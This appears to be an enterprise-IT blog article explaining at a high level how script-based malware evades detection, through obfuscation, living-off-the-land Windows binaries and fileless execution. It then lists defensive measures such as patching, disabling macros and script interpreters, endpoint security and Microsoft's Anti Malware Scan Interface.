Protecting enterprise networks from evasive script threats

Protecting enterprise networks

CIOs believe that increased frequency of evasive malware like Emotet and script-based attacks is because that conventional antimalware solution cannot prevent them

To avoid detection, cybercriminals deploy evasion techniques; these are common with regards scripts. Technically scripts have legal uses as well – like computer system automation. However, malicious actors use scripts for nefarious purposes.

These malicious scripts will not be blocked or even detected by the conventional antimalware solutions deployed by organizations. Cybercriminals have increased the utilization of evasive malware Emotet and other script-based attacks.

Emotet is just one example of an evasive threat tactic that uses scripts. Other evasion techniques exist that deploy script-based strategies, which can cause significant harm to enterprise networks.

Obfuscation of script content

The real behavior of a script is hidden by ‘content obfuscation.’ Obfuscation has a legal purpose too. However, in the case of evasive strategies, obfuscation makes it nearly impossible to detect the script’s real nature.

Living off the Land Binaries (LoLBins)

LoLBins are default apps present on a Windows device. They can be manipulated by cybercriminals to launch the traditional attack steps. They wouldn’t even need to download extra tools onto the target device or network.

The LoLBins can develop post-reboot persistence, circumvent user access restrictions, harvest passwords, and sensitive data, and even gain control of network systems.

Read More: AI’s importance in enterprise IT

Criminals utilize various Windows OS native LoLBins. Some examples are regsvr32.exe, powershell.exe, certutil.exe, etc. It is just a tactic used by hackers to mask their activities. This is required, as most default OS applications will not be blocked or marked by an anti-malware package.

Security leaders say that it is challenging to detect nefarious activities based out of LoLBins unless the security teams have visibility into accurate commands executed by the processes.

Evasive and file-less execution

Actions can be executed without files when using scripts. Memory is allocated on the system via a script; later on, a shellcode gets written for the memory so that control can be transferred to the memory. As a result, nefarious activities are carried out in the memory, without a file. This makes it quite complex to identify the source and stop the process.

The execution of file-less infection can be blocked by restarting the system as the memory gets cleared during reboot. Hackers are now working out ways to deploy persistence even via file-less data breach. One of the workarounds was storing files in Windows Registry, LNK files, and Scheduled tasks.

Preventing such attacks

CIOs suggest methods like ensuring all applications are up to date. Criminals will be searching for vulnerabilities that could potentially be present in outdated versions. Updating all third-party and Windows apps will reduce the risk.

Read More: IoT – Majority of Enterprises See Strong Cases for IoT Adoption

Since most business users don’t require macros, it is suggested to disable script interpreters and macros. If any downloaded file requests for permission to view macros, IT  needs to deny permission. IT department should ensure that all macros and script interpreters are disabled to prevent potential attacks.

The removal of third-party apps is also advised. Java and Python are apps that are present by default and mostly unused. A simple removal of these unnecessary apps in systems will enhance the security profile. End-users need to be taught about the dangers, and deploying endpoint security is another prevention measure suggested by prominent security professionals.

As a bonus, Windows 10 OS has included Microsoft’s Anti Malware Scan Interface in the latest version to mitigate the attacks based on obfuscated scripts. Cybercriminals continue to evolve in the attack tactics, and it is imperative that enterprises also take simultaneous steps to prevent such malicious attacks by boosting their cyber resilience.